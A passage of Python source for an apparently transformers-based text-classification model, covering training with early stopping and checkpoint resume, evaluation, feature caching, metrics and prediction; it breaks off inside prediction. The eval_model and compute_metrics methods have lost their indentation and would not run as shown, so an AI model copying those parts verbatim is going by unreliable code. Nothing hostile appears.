        if self.args.silent:
            show_running_loss = False
        # Fail fast on an invalid configuration before any data processing is done.
        if self.args.evaluate_during_training and eval_df is None:
            raise ValueError(
                "evaluate_during_training is enabled but eval_df is not specified."
                " Pass eval_df to model.train_model() if using evaluate_during_training."
            )
        if not output_dir:
            output_dir = self.args.output_dir
        # Refuse to silently clobber a previous run's output.
        if os.path.exists(output_dir) and os.listdir(output_dir) and not self.args.overwrite_output_dir:
            raise ValueError(
                "Output directory ({}) already exists and is not empty."
                " Use --overwrite_output_dir to overcome.".format(output_dir)
            )
        self._move_model_to_device()
        # Lazy loading streams examples from a file path instead of holding a
        # full DataFrame in memory; it is incompatible with sliding windows.
        if isinstance(train_df, str) and self.args.lazy_loading:
            if self.args.sliding_window:
                raise ValueError("Lazy loading cannot be used with sliding window.")
            train_dataset = LazyClassificationDataset(train_df, self.tokenizer, self.args)
        else:
            if self.args.lazy_loading:
                raise ValueError("Input must be given as a path to a file when using lazy loading")
            # Build InputExamples from the DataFrame. Three layouts are supported:
            # ('text', 'labels'), sentence pairs ('text_a', 'text_b', 'labels'),
            # or headerless positional columns (col 0 = text, col 1 = labels).
            if "text" in train_df.columns and "labels" in train_df.columns:
                train_examples = [
                    InputExample(i, text, None, label)
                    for i, (text, label) in enumerate(zip(train_df["text"].astype(str), train_df["labels"]))
                ]
            elif "text_a" in train_df.columns and "text_b" in train_df.columns:
                train_examples = [
                    InputExample(i, text_a, text_b, label)
                    for i, (text_a, text_b, label) in enumerate(
                        zip(train_df["text_a"].astype(str), train_df["text_b"].astype(str), train_df["labels"])
                    )
                ]
            else:
                warnings.warn(
                    "Dataframe headers not specified. Falling back to using column 0 as text and column 1 as labels."
                )
                train_examples = [
                    InputExample(i, text, None, label)
                    for i, (text, label) in enumerate(zip(train_df.iloc[:, 0], train_df.iloc[:, 1]))
                ]
            train_dataset = self.load_and_cache_examples(train_examples, verbose=verbose)
        train_sampler = RandomSampler(train_dataset)
        train_dataloader = DataLoader(
            train_dataset,
            sampler=train_sampler,
            batch_size=self.args.train_batch_size,
            num_workers=self.args.dataloader_num_workers,
        )
        os.makedirs(output_dir, exist_ok=True)
        global_step, tr_loss = self.train(
            train_dataloader,
            output_dir,
            multi_label=multi_label,
            show_running_loss=show_running_loss,
            eval_df=eval_df,
            verbose=verbose,
            **kwargs,
        )
        # _save_model with no output_dir writes model, tokenizer and args to
        # self.args.output_dir.
        self._save_model(model=self.model)
        if verbose:
            logger.info(" Training of {} model complete. Saved to {}.".format(self.args.model_type, output_dir))
    def train(
        self,
        train_dataloader,
        output_dir,
        multi_label=False,
        show_running_loss=True,
        eval_df=None,
        verbose=True,
        **kwargs,
    ):
        """
        Trains the model on train_dataset.
        Utility function to be used by the train_model() method. Not intended to be used directly.
        """
        model = self.model
        args = self.args
        tb_writer = SummaryWriter(logdir=args.tensorboard_dir)
        # Total number of optimizer updates over the whole run (accumulation-aware).
        t_total = len(train_dataloader) // args.gradient_accumulation_steps * args.num_train_epochs
        no_decay = ["bias", "LayerNorm.weight"]
        optimizer_grouped_parameters = []
        custom_parameter_names = set()
        # 1) User-specified parameter groups (e.g. per-group learning rates).
        #    Any parameter claimed here is excluded from the later groups.
        for group in self.args.custom_parameter_groups:
            params = group.pop("params")
            custom_parameter_names.update(params)
            param_group = {**group}
            param_group["params"] = [p for n, p in model.named_parameters() if n in params]
            optimizer_grouped_parameters.append(param_group)
        # 2) Per-layer overrides: each requested layer contributes a weight-decay
        #    group and a no-decay group (bias / LayerNorm parameters).
        for group in self.args.custom_layer_parameters:
            layer_number = group.pop("layer")
            layer = f"layer.{layer_number}."
            group_d = {**group}
            group_nd = {**group}
            group_nd["weight_decay"] = 0.0
            params_d = []
            params_nd = []
            for n, p in model.named_parameters():
                if n not in custom_parameter_names and layer in n:
                    if any(nd in n for nd in no_decay):
                        params_nd.append(p)
                    else:
                        params_d.append(p)
                    custom_parameter_names.add(n)
            group_d["params"] = params_d
            group_nd["params"] = params_nd
            optimizer_grouped_parameters.append(group_d)
            optimizer_grouped_parameters.append(group_nd)
        # 3) All remaining parameters: standard weight decay, except for the
        #    no-decay names which get weight_decay=0.0.
        if not self.args.train_custom_parameters_only:
            optimizer_grouped_parameters.extend(
                [
                    {
                        "params": [
                            p
                            for n, p in model.named_parameters()
                            if n not in custom_parameter_names and not any(nd in n for nd in no_decay)
                        ],
                        "weight_decay": args.weight_decay,
                    },
                    {
                        "params": [
                            p
                            for n, p in model.named_parameters()
                            if n not in custom_parameter_names and any(nd in n for nd in no_decay)
                        ],
                        "weight_decay": 0.0,
                    },
                ]
            )
        # warmup_ratio derives warmup_steps only when it was not set explicitly.
        warmup_steps = math.ceil(t_total * args.warmup_ratio)
        args.warmup_steps = warmup_steps if args.warmup_steps == 0 else args.warmup_steps
        optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
        scheduler = get_linear_schedule_with_warmup(
            optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=t_total
        )
        if args.n_gpu > 1:
            model = torch.nn.DataParallel(model)
        global_step = 0
        tr_loss, logging_loss = 0.0, 0.0
        model.zero_grad()
        train_iterator = trange(int(args.num_train_epochs), desc="Epoch", disable=args.silent, mininterval=0)
        epoch_number = 0
        best_eval_metric = None
        early_stopping_counter = 0
        steps_trained_in_current_epoch = 0
        epochs_trained = 0
        current_loss = "Initializing"
        # Resume support: when model_name points to a "checkpoint-<step>[-epoch-<e>]"
        # directory, recover global_step from the directory name and skip the
        # already-trained epochs/steps below.
        if args.model_name and os.path.exists(args.model_name):
            try:
                # set global_step to gobal_step of last saved checkpoint from model path
                checkpoint_suffix = args.model_name.split("/")[-1].split("-")
                if len(checkpoint_suffix) > 2:
                    checkpoint_suffix = checkpoint_suffix[1]
                else:
                    checkpoint_suffix = checkpoint_suffix[-1]
                global_step = int(checkpoint_suffix)
                epochs_trained = global_step // (len(train_dataloader) // args.gradient_accumulation_steps)
                steps_trained_in_current_epoch = global_step % (
                    len(train_dataloader) // args.gradient_accumulation_steps
                )
                logger.info(" Continuing training from checkpoint, will skip to saved global_step")
                logger.info(" Continuing training from epoch %d", epochs_trained)
                logger.info(" Continuing training from global step %d", global_step)
                logger.info(" Will skip the first %d steps in the current epoch", steps_trained_in_current_epoch)
            except ValueError:
                logger.info(" Starting fine-tuning.")
        if args.evaluate_during_training:
            training_progress_scores = self._create_training_progress_scores(multi_label, **kwargs)
        if args.wandb_project:
            wandb.init(project=args.wandb_project, config={**asdict(args)}, **args.wandb_kwargs)
            wandb.watch(self.model)
        if args.fp16:
            from torch.cuda import amp
            scaler = amp.GradScaler()
        model.train()
        for _ in train_iterator:
            # Skip epochs already covered by a resumed checkpoint.
            if epochs_trained > 0:
                epochs_trained -= 1
                continue
            train_iterator.set_description(f"Epoch {epoch_number + 1} of {args.num_train_epochs}")
            batch_iterator = tqdm(
                train_dataloader,
                desc=f"Running Epoch {epoch_number} of {args.num_train_epochs}",
                disable=args.silent,
                mininterval=0,
            )
            for step, batch in enumerate(batch_iterator):
                # Skip steps already covered by a resumed checkpoint.
                if steps_trained_in_current_epoch > 0:
                    steps_trained_in_current_epoch -= 1
                    continue
                inputs = self._get_inputs_dict(batch)
                if args.fp16:
                    with amp.autocast():
                        outputs = model(**inputs)
                        # model outputs are always tuple in pytorch-transformers (see doc)
                        loss = outputs[0]
                else:
                    outputs = model(**inputs)
                    # model outputs are always tuple in pytorch-transformers (see doc)
                    loss = outputs[0]
                if args.n_gpu > 1:
                    loss = loss.mean() # mean() to average on multi-gpu parallel training
                current_loss = loss.item()
                if show_running_loss:
                    batch_iterator.set_description(
                        f"Epochs {epoch_number}/{args.num_train_epochs}. Running Loss: {current_loss:9.4f}"
                    )
                if args.gradient_accumulation_steps > 1:
                    loss = loss / args.gradient_accumulation_steps
                if args.fp16:
                    scaler.scale(loss).backward()
                else:
                    loss.backward()
                tr_loss += loss.item()
                # Optimizer update only every gradient_accumulation_steps batches.
                if (step + 1) % args.gradient_accumulation_steps == 0:
                    if args.fp16:
                        scaler.unscale_(optimizer)
                    torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
                    if args.fp16:
                        scaler.step(optimizer)
                        scaler.update()
                    else:
                        optimizer.step()
                    scheduler.step() # Update learning rate schedule
                    model.zero_grad()
                    global_step += 1
                    if args.logging_steps > 0 and global_step % args.logging_steps == 0:
                        # Log metrics
                        tb_writer.add_scalar("lr", scheduler.get_lr()[0], global_step)
                        tb_writer.add_scalar("loss", (tr_loss - logging_loss) / args.logging_steps, global_step)
                        logging_loss = tr_loss
                        if args.wandb_project:
                            wandb.log(
                                {
                                    "Training loss": current_loss,
                                    "lr": scheduler.get_lr()[0],
                                    "global_step": global_step,
                                }
                            )
                    if args.save_steps > 0 and global_step % args.save_steps == 0:
                        # Save model checkpoint
                        output_dir_current = os.path.join(output_dir, "checkpoint-{}".format(global_step))
                        self._save_model(output_dir_current, optimizer, scheduler, model=model)
                    # Mid-epoch evaluation + early stopping, every
                    # evaluate_during_training_steps optimizer updates.
                    if args.evaluate_during_training and (
                        args.evaluate_during_training_steps > 0
                        and global_step % args.evaluate_during_training_steps == 0
                    ):
                        # Only evaluate when single GPU otherwise metrics may not average well
                        results, _, _ = self.eval_model(
                            eval_df,
                            verbose=verbose and args.evaluate_during_training_verbose,
                            silent=args.evaluate_during_training_silent,
                            wandb_log=False,
                            **kwargs,
                        )
                        for key, value in results.items():
                            tb_writer.add_scalar("eval_{}".format(key), value, global_step)
                        output_dir_current = os.path.join(output_dir, "checkpoint-{}".format(global_step))
                        if args.save_eval_checkpoints:
                            self._save_model(output_dir_current, optimizer, scheduler, model=model, results=results)
                        training_progress_scores["global_step"].append(global_step)
                        training_progress_scores["train_loss"].append(current_loss)
                        for key in results:
                            training_progress_scores[key].append(results[key])
                        report = pd.DataFrame(training_progress_scores)
                        report.to_csv(
                            os.path.join(args.output_dir, "training_progress_scores.csv"), index=False,
                        )
                        if args.wandb_project:
                            wandb.log(self._get_last_metrics(training_progress_scores))
                        # First evaluation initializes the best metric and saves
                        # a first "best model" snapshot.
                        if not best_eval_metric:
                            best_eval_metric = results[args.early_stopping_metric]
                            self._save_model(args.best_model_dir, optimizer, scheduler, model=model, results=results)
                        # Early stopping: an improvement must beat the previous best
                        # by more than early_stopping_delta (direction depends on
                        # early_stopping_metric_minimize).
                        if best_eval_metric and args.early_stopping_metric_minimize:
                            if best_eval_metric - results[args.early_stopping_metric] > args.early_stopping_delta:
                                best_eval_metric = results[args.early_stopping_metric]
                                self._save_model(
                                    args.best_model_dir, optimizer, scheduler, model=model, results=results
                                )
                                early_stopping_counter = 0
                            else:
                                if args.use_early_stopping:
                                    if early_stopping_counter < args.early_stopping_patience:
                                        early_stopping_counter += 1
                                        if verbose:
                                            logger.info(f" No improvement in {args.early_stopping_metric}")
                                            logger.info(f" Current step: {early_stopping_counter}")
                                            logger.info(f" Early stopping patience: {args.early_stopping_patience}")
                                    else:
                                        if verbose:
                                            logger.info(f" Patience of {args.early_stopping_patience} steps reached")
                                            logger.info(" Training terminated.")
                                        train_iterator.close()
                                        return global_step, tr_loss / global_step
                        else:
                            if results[args.early_stopping_metric] - best_eval_metric > args.early_stopping_delta:
                                best_eval_metric = results[args.early_stopping_metric]
                                self._save_model(
                                    args.best_model_dir, optimizer, scheduler, model=model, results=results
                                )
                                early_stopping_counter = 0
                            else:
                                if args.use_early_stopping:
                                    if early_stopping_counter < args.early_stopping_patience:
                                        early_stopping_counter += 1
                                        if verbose:
                                            logger.info(f" No improvement in {args.early_stopping_metric}")
                                            logger.info(f" Current step: {early_stopping_counter}")
                                            logger.info(f" Early stopping patience: {args.early_stopping_patience}")
                                    else:
                                        if verbose:
                                            logger.info(f" Patience of {args.early_stopping_patience} steps reached")
                                            logger.info(" Training terminated.")
                                        train_iterator.close()
                                        return global_step, tr_loss / global_step
            # End-of-epoch bookkeeping: checkpointing and (optionally) another
            # evaluation + early-stopping round gated by early_stopping_consider_epochs.
            epoch_number += 1
            output_dir_current = os.path.join(output_dir, "checkpoint-{}-epoch-{}".format(global_step, epoch_number))
            if args.save_model_every_epoch or args.evaluate_during_training:
                os.makedirs(output_dir_current, exist_ok=True)
            if args.save_model_every_epoch:
                self._save_model(output_dir_current, optimizer, scheduler, model=model)
            if args.evaluate_during_training:
                results, _, _ = self.eval_model(
                    eval_df,
                    verbose=verbose and args.evaluate_during_training_verbose,
                    silent=args.evaluate_during_training_silent,
                    wandb_log=False,
                    **kwargs,
                )
                self._save_model(output_dir_current, optimizer, scheduler, results=results)
                training_progress_scores["global_step"].append(global_step)
                training_progress_scores["train_loss"].append(current_loss)
                for key in results:
                    training_progress_scores[key].append(results[key])
                report = pd.DataFrame(training_progress_scores)
                report.to_csv(os.path.join(args.output_dir, "training_progress_scores.csv"), index=False)
                if args.wandb_project:
                    wandb.log(self._get_last_metrics(training_progress_scores))
                if not best_eval_metric:
                    best_eval_metric = results[args.early_stopping_metric]
                    self._save_model(args.best_model_dir, optimizer, scheduler, model=model, results=results)
                if best_eval_metric and args.early_stopping_metric_minimize:
                    if best_eval_metric - results[args.early_stopping_metric] > args.early_stopping_delta:
                        best_eval_metric = results[args.early_stopping_metric]
                        self._save_model(args.best_model_dir, optimizer, scheduler, model=model, results=results)
                        early_stopping_counter = 0
                    else:
                        if args.use_early_stopping and args.early_stopping_consider_epochs:
                            if early_stopping_counter < args.early_stopping_patience:
                                early_stopping_counter += 1
                                if verbose:
                                    logger.info(f" No improvement in {args.early_stopping_metric}")
                                    logger.info(f" Current step: {early_stopping_counter}")
                                    logger.info(f" Early stopping patience: {args.early_stopping_patience}")
                            else:
                                if verbose:
                                    logger.info(f" Patience of {args.early_stopping_patience} steps reached")
                                    logger.info(" Training terminated.")
                                train_iterator.close()
                                return global_step, tr_loss / global_step
                else:
                    if results[args.early_stopping_metric] - best_eval_metric > args.early_stopping_delta:
                        best_eval_metric = results[args.early_stopping_metric]
                        self._save_model(args.best_model_dir, optimizer, scheduler, model=model, results=results)
                        early_stopping_counter = 0
                    else:
                        if args.use_early_stopping and args.early_stopping_consider_epochs:
                            if early_stopping_counter < args.early_stopping_patience:
                                early_stopping_counter += 1
                                if verbose:
                                    logger.info(f" No improvement in {args.early_stopping_metric}")
                                    logger.info(f" Current step: {early_stopping_counter}")
                                    logger.info(f" Early stopping patience: {args.early_stopping_patience}")
                            else:
                                if verbose:
                                    logger.info(f" Patience of {args.early_stopping_patience} steps reached")
                                    logger.info(" Training terminated.")
                                train_iterator.close()
                                return global_step, tr_loss / global_step
        return global_step, tr_loss / global_step
def eval_model(
self, eval_df, multi_label=False, output_dir=None, verbose=True, silent=False, wandb_log=True, **kwargs
):
"""
Evaluates the model on eval_df. Saves results to output_dir.
Args:
eval_df: Pandas Dataframe containing at least two columns. If the Dataframe has a header, it should contain a 'text' and a 'labels' column. If no header is present,
the Dataframe should contain at least two columns, with the first column containing the text, and the second column containing the label. The model will be evaluated on this Dataframe.
output_dir: The directory where model files will be saved. If not given, self.args.output_dir will be used.
verbose: If verbose, results will be printed to the console on completion of evaluation.
silent: If silent, tqdm progress bars will be hidden.
wandb_log: If True, evaluation results will be logged to wandb.
**kwargs: Additional metrics that should be used. Pass in the metrics as keyword arguments (name of metric: function to use). E.g. f1=sklearn.metrics.f1_score.
A metric function should take in two parameters. The first parameter will be the true labels, and the second parameter will be the predictions.
Returns:
result: Dictionary containing evaluation results.
model_outputs: List of model outputs for each row in eval_df
wrong_preds: List of InputExample objects corresponding to each incorrect prediction by the model
""" # noqa: ignore flake8"
if not output_dir:
output_dir = self.args.output_dir
self._move_model_to_device()
result, model_outputs, wrong_preds = self.evaluate(
eval_df, output_dir, multi_label=multi_label, verbose=verbose, silent=silent, wandb_log=wandb_log, **kwargs
)
self.results.update(result)
if verbose:
logger.info(self.results)
return result, model_outputs, wrong_preds
    def evaluate(
        self, eval_df, output_dir, multi_label=False, prefix="", verbose=True, silent=False, wandb_log=True, **kwargs
    ):
        """
        Evaluates the model on eval_df.
        Utility function to be used by the eval_model() method. Not intended to be used directly.
        """
        model = self.model
        args = self.args
        eval_output_dir = output_dir
        results = {}
        # Lazy loading expects a file path; otherwise eval_df must be a DataFrame.
        if isinstance(eval_df, str) and self.args.lazy_loading:
            eval_dataset = LazyClassificationDataset(eval_df, self.tokenizer, self.args)
            eval_examples = None
        else:
            if self.args.lazy_loading:
                raise ValueError("Input must be given as a path to a file when using lazy loading")
            # Same three DataFrame layouts as in train_model: ('text', 'labels'),
            # sentence pairs ('text_a', 'text_b'), or headerless positional columns.
            if "text" in eval_df.columns and "labels" in eval_df.columns:
                eval_examples = [
                    InputExample(i, text, None, label)
                    for i, (text, label) in enumerate(zip(eval_df["text"].astype(str), eval_df["labels"]))
                ]
            elif "text_a" in eval_df.columns and "text_b" in eval_df.columns:
                eval_examples = [
                    InputExample(i, text_a, text_b, label)
                    for i, (text_a, text_b, label) in enumerate(
                        zip(eval_df["text_a"].astype(str), eval_df["text_b"].astype(str), eval_df["labels"])
                    )
                ]
            else:
                warnings.warn(
                    "Dataframe headers not specified. Falling back to using column 0 as text and column 1 as labels."
                )
                eval_examples = [
                    InputExample(i, text, None, label)
                    for i, (text, label) in enumerate(zip(eval_df.iloc[:, 0], eval_df.iloc[:, 1]))
                ]
        # With sliding windows, load_and_cache_examples also returns how many
        # windows each original example was split into.
        if args.sliding_window:
            eval_dataset, window_counts = self.load_and_cache_examples(
                eval_examples, evaluate=True, verbose=verbose, silent=silent
            )
        else:
            eval_dataset = self.load_and_cache_examples(
                eval_examples, evaluate=True, verbose=verbose, silent=silent
            )
        os.makedirs(eval_output_dir, exist_ok=True)
        eval_sampler = SequentialSampler(eval_dataset)
        eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)
        eval_loss = 0.0
        nb_eval_steps = 0
        preds = None
        out_label_ids = None
        model.eval()
        # Accumulate logits and gold labels batch-by-batch as NumPy arrays.
        for batch in tqdm(eval_dataloader, disable=args.silent or silent, desc="Running Evaluation"):
            # batch = tuple(t.to(device) for t in batch)
            with torch.no_grad():
                inputs = self._get_inputs_dict(batch)
                outputs = model(**inputs)
                tmp_eval_loss, logits = outputs[:2]
                if multi_label:
                    logits = logits.sigmoid()
                eval_loss += tmp_eval_loss.mean().item()
            nb_eval_steps += 1
            if preds is None:
                preds = logits.detach().cpu().numpy()
                out_label_ids = inputs["labels"].detach().cpu().numpy()
            else:
                preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
                out_label_ids = np.append(out_label_ids, inputs["labels"].detach().cpu().numpy(), axis=0)
        eval_loss = eval_loss / nb_eval_steps
        if args.sliding_window:
            # Regroup per-window predictions back into one group per original
            # example, then resolve each example by majority vote over windows;
            # exact ties fall back to args.tie_value.
            count = 0
            window_ranges = []
            for n_windows in window_counts:
                window_ranges.append([count, count + n_windows])
                count += n_windows
            preds = [preds[window_range[0] : window_range[1]] for window_range in window_ranges]
            out_label_ids = [
                out_label_ids[i] for i in range(len(out_label_ids)) if i in [window[0] for window in window_ranges]
            ]
            model_outputs = preds
            preds = [np.argmax(pred, axis=1) for pred in preds]
            final_preds = []
            for pred_row in preds:
                mode_pred, counts = mode(pred_row)
                if len(counts) > 1 and counts[0] == counts[1]:
                    final_preds.append(args.tie_value)
                else:
                    final_preds.append(mode_pred[0])
            preds = np.array(final_preds)
        elif not multi_label and args.regression is True:
            preds = np.squeeze(preds)
            model_outputs = preds
        else:
            model_outputs = preds
            if not multi_label:
                preds = np.argmax(preds, axis=1)
        result, wrong = self.compute_metrics(preds, out_label_ids, eval_examples, **kwargs)
        result["eval_loss"] = eval_loss
        results.update(result)
        output_eval_file = os.path.join(eval_output_dir, "eval_results.txt")
        with open(output_eval_file, "w") as writer:
            for key in sorted(result.keys()):
                writer.write("{} = {}\n".format(key, str(result[key])))
        # Optional wandb visualizations (single-label classification only).
        if self.args.wandb_project and wandb_log and not multi_label and not self.args.regression:
            wandb.init(project=args.wandb_project, config={**asdict(args)}, **args.wandb_kwargs)
            if not args.labels_map:
                self.args.labels_map = {i: i for i in range(self.num_labels)}
            labels_list = sorted(list(self.args.labels_map.keys()))
            inverse_labels_map = {value: key for key, value in self.args.labels_map.items()}
            truth = [inverse_labels_map[out] for out in out_label_ids]
            # ROC
            wandb.log({"roc": wandb.plots.ROC(truth, model_outputs, labels_list)})
            # Precision Recall
            wandb.log({"pr": wandb.plots.precision_recall(truth, model_outputs, labels_list)})
            # Confusion Matrix
            wandb.sklearn.plot_confusion_matrix(
                truth, [inverse_labels_map[np.argmax(out)] for out in model_outputs], labels=labels_list,
            )
        return results, model_outputs, wrong
    def load_and_cache_examples(
        self, examples, evaluate=False, no_cache=False, multi_label=False, verbose=True, silent=False
    ):
        """
        Converts a list of InputExample objects to a TensorDataset containing InputFeatures. Caches the InputFeatures.
        Utility function for train() and eval() methods. Not intended to be used directly.
        """
        process_count = self.args.process_count
        tokenizer = self.tokenizer
        args = self.args
        # The explicit no_cache parameter takes priority; otherwise fall back to args.
        if not no_cache:
            no_cache = args.no_cache
        if not multi_label and args.regression:
            output_mode = "regression"
        else:
            output_mode = "classification"
        if not no_cache:
            os.makedirs(self.args.cache_dir, exist_ok=True)
        mode = "dev" if evaluate else "train"
        # Cache key encodes everything that would change the features; NOTE: it
        # uses len(examples), not the example contents, so different datasets of
        # the same size can collide unless reprocess_input_data is set.
        cached_features_file = os.path.join(
            args.cache_dir,
            "cached_{}_{}_{}_{}_{}".format(
                mode, args.model_type, args.max_seq_length, self.num_labels, len(examples),
            ),
        )
        if os.path.exists(cached_features_file) and (
            (not args.reprocess_input_data and not no_cache)
            or (mode == "dev" and args.use_cached_eval_features and not no_cache)
        ):
            features = torch.load(cached_features_file)
            if verbose:
                logger.info(f" Features loaded from cache at {cached_features_file}")
        else:
            if verbose:
                logger.info(" Converting to features started. Cache is not used.")
                if args.sliding_window:
                    logger.info(" Sliding window enabled")
            # If labels_map is defined, then labels need to be replaced with ints
            if self.args.labels_map:
                for example in examples:
                    if multi_label:
                        example.label = [self.args.labels_map[label] for label in example.label]
                    else:
                        example.label = self.args.labels_map[example.label]
            features = convert_examples_to_features(
                examples,
                args.max_seq_length,
                tokenizer,
                output_mode,
                # XLNet has a CLS token at the end
                cls_token_at_end=bool(args.model_type in ["xlnet"]),
                cls_token=tokenizer.cls_token,
                cls_token_segment_id=2 if args.model_type in ["xlnet"] else 0,
                sep_token=tokenizer.sep_token,
                # RoBERTa uses an extra separator b/w pairs of sentences,
                # cf. github.com/pytorch/fairseq/commit/1684e166e3da03f5b600dbb7855cb98ddfcd0805
                sep_token_extra=bool(args.model_type in ["roberta", "camembert", "xlmroberta", "longformer"]),
                # PAD on the left for XLNet
                pad_on_left=bool(args.model_type in ["xlnet"]),
                pad_token=tokenizer.convert_tokens_to_ids([tokenizer.pad_token])[0],
                pad_token_segment_id=4 if args.model_type in ["xlnet"] else 0,
                process_count=process_count,
                multi_label=multi_label,
                silent=args.silent or silent,
                use_multiprocessing=args.use_multiprocessing,
                sliding_window=args.sliding_window,
                # Training flattens windows into independent samples; evaluation
                # keeps them grouped so votes can be aggregated per example.
                flatten=not evaluate,
                stride=args.stride,
                add_prefix_space=bool(args.model_type in ["roberta", "camembert", "xlmroberta", "longformer"]),
                args=args,
            )
            if verbose and args.sliding_window:
                logger.info(f" {len(features)} features created from {len(examples)} samples.")
            if not no_cache:
                torch.save(features, cached_features_file)
        if args.sliding_window and evaluate:
            # Normalize to a list of window-lists, record each example's window
            # count, then flatten for tensorization.
            features = [
                [feature_set] if not isinstance(feature_set, list) else feature_set for feature_set in features
            ]
            window_counts = [len(sample) for sample in features]
            features = [feature for feature_set in features for feature in feature_set]
        all_input_ids = torch.tensor([f.input_ids for f in features], dtype=torch.long)
        all_input_mask = torch.tensor([f.input_mask for f in features], dtype=torch.long)
        all_segment_ids = torch.tensor([f.segment_ids for f in features], dtype=torch.long)
        if output_mode == "classification":
            all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long)
        elif output_mode == "regression":
            all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.float)
        dataset = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids)
        if args.sliding_window and evaluate:
            return dataset, window_counts
        else:
            return dataset
def compute_metrics(self, preds, labels, eval_examples=None, multi_label=False, **kwargs):
"""
Computes the evaluation metrics for the model predictions.
Args:
preds: Model predictions
labels: Ground truth labels
eval_examples: List of examples on which evaluation was performed
**kwargs: Additional metrics that should be used. Pass in the metrics as keyword arguments (name of metric: function to use). E.g. f1=sklearn.metrics.f1_score.
A metric function should take in two parameters. The first parameter will be the true labels, and the second parameter will be the predictions.
Returns:
result: Dictionary containing evaluation results. (Matthews correlation coefficient, tp, tn, fp, fn)
wrong: List of InputExample objects corresponding to each incorrect prediction by the model
""" # noqa: ignore flake8"
assert len(preds) == len(labels)
extra_metrics = {}
for metric, func in kwargs.items():
extra_metrics[metric] = func(labels, preds)
mismatched = labels != preds
if eval_examples:
wrong = [i for (i, v) in zip(eval_examples, mismatched) if v.any()]
else:
wrong = ["NA"]
if multi_label:
label_ranking_score = label_ranking_average_precision_score(labels, preds)
return {**{"LRAP": label_ranking_score}, **extra_metrics}, wrong
elif self.args.regression:
return {**extra_metrics}, wrong
mcc = matthews_corrcoef(labels, preds)
if self.model.num_labels == 2:
tn, fp, fn, tp = confusion_matrix(labels, preds, labels=[0, 1]).ravel()
return (
{**{"mcc": mcc, "tp": tp, "tn": tn, "fp": fp, "fn": fn}, **extra_metrics},
wrong,
)
else:
return {**{"mcc": mcc}, **extra_metrics}, wrong
    def predict(self, to_predict, multi_label=False):
        """
        Performs predictions on a list of text.
        Args:
            to_predict: A python list of text (str) to be sent to the model for prediction.
        Returns:
            preds: A python list of the predictions (0 or 1) for each text.
            model_outputs: A python list of the raw model outputs for each text.

        Note: when self.config.output_hidden_states is set, the embedding
        outputs and per-layer hidden states are returned as well.
        """
        model = self.model
        args = self.args

        self._move_model_to_device()

        # Labels are irrelevant for prediction, but InputExample requires one;
        # pick any key from the labels_map (or 0) as a stand-in.
        dummy_label = 0 if not self.args.labels_map else next(iter(self.args.labels_map.keys()))
        if multi_label:
            # The comprehension-local `i` below does not clobber the
            # enumerate index (Python 3 comprehension scoping).
            eval_examples = [
                InputExample(i, text, None, [dummy_label for i in range(self.num_labels)])
                for i, text in enumerate(to_predict)
            ]
        else:
            # A list element means a (text_a, text_b) sentence pair.
            if isinstance(to_predict[0], list):
                eval_examples = [InputExample(i, text[0], text[1], dummy_label) for i, text in enumerate(to_predict)]
            else:
                eval_examples = [InputExample(i, text, None, dummy_label) for i, text in enumerate(to_predict)]
        # With sliding windows each example maps to several feature windows;
        # window_counts records how many windows belong to each example.
        if args.sliding_window:
            eval_dataset, window_counts = self.load_and_cache_examples(eval_examples, evaluate=True, no_cache=True)
        else:
            eval_dataset = self.load_and_cache_examples(
                eval_examples, evaluate=True, multi_label=multi_label, no_cache=True
            )

        eval_sampler = SequentialSampler(eval_dataset)
        eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)

        eval_loss = 0.0
        nb_eval_steps = 0
        preds = None
        out_label_ids = None

        # Two near-identical inference loops: the first also accumulates
        # embedding outputs and per-layer hidden states.
        if self.config.output_hidden_states:
            for batch in tqdm(eval_dataloader, disable=args.silent, desc="Running Prediction"):
                model.eval()
                # batch = tuple(t.to(device) for t in batch)
                with torch.no_grad():
                    inputs = self._get_inputs_dict(batch)
                    outputs = model(**inputs)
                    tmp_eval_loss, logits = outputs[:2]
                    embedding_outputs, layer_hidden_states = outputs[2][0], outputs[2][1:]
                    if multi_label:
                        logits = logits.sigmoid()
                    eval_loss += tmp_eval_loss.mean().item()
                nb_eval_steps += 1
                if preds is None:
                    # First batch initializes the accumulators.
                    preds = logits.detach().cpu().numpy()
                    out_label_ids = inputs["labels"].detach().cpu().numpy()
                    all_layer_hidden_states = np.array([state.detach().cpu().numpy() for state in layer_hidden_states])
                    all_embedding_outputs = embedding_outputs.detach().cpu().numpy()
                else:
                    preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
                    out_label_ids = np.append(out_label_ids, inputs["labels"].detach().cpu().numpy(), axis=0)
                    all_layer_hidden_states = np.append(
                        all_layer_hidden_states,
                        np.array([state.detach().cpu().numpy() for state in layer_hidden_states]),
                        axis=1,
                    )
                    all_embedding_outputs = np.append(
                        all_embedding_outputs, embedding_outputs.detach().cpu().numpy(), axis=0
                    )
        else:
            for batch in tqdm(eval_dataloader, disable=args.silent):
                model.eval()
                # batch = tuple(t.to(device) for t in batch)
                with torch.no_grad():
                    inputs = self._get_inputs_dict(batch)
                    outputs = model(**inputs)
                    tmp_eval_loss, logits = outputs[:2]
                    if multi_label:
                        logits = logits.sigmoid()
                    eval_loss += tmp_eval_loss.mean().item()
                nb_eval_steps += 1
                if preds is None:
                    preds = logits.detach().cpu().numpy()
                    out_label_ids = inputs["labels"].detach().cpu().numpy()
                else:
                    preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
                    out_label_ids = np.append(out_label_ids, inputs["labels"].detach().cpu().numpy(), axis=0)

        eval_loss = eval_loss / nb_eval_steps

        if args.sliding_window:
            # Regroup the flat window predictions back per example, then take
            # a majority vote across each example's windows; exact ties fall
            # back to args.tie_value.
            count = 0
            window_ranges = []
            for n_windows in window_counts:
                window_ranges.append([count, count + n_windows])
                count += n_windows
            preds = [preds[window_range[0] : window_range[1]] for window_range in window_ranges]
            model_outputs = preds
            preds = [np.argmax(pred, axis=1) for pred in preds]
            final_preds = []
            for pred_row in preds:
                mode_pred, counts = mode(pred_row)
                if len(counts) > 1 and counts[0] == counts[1]:
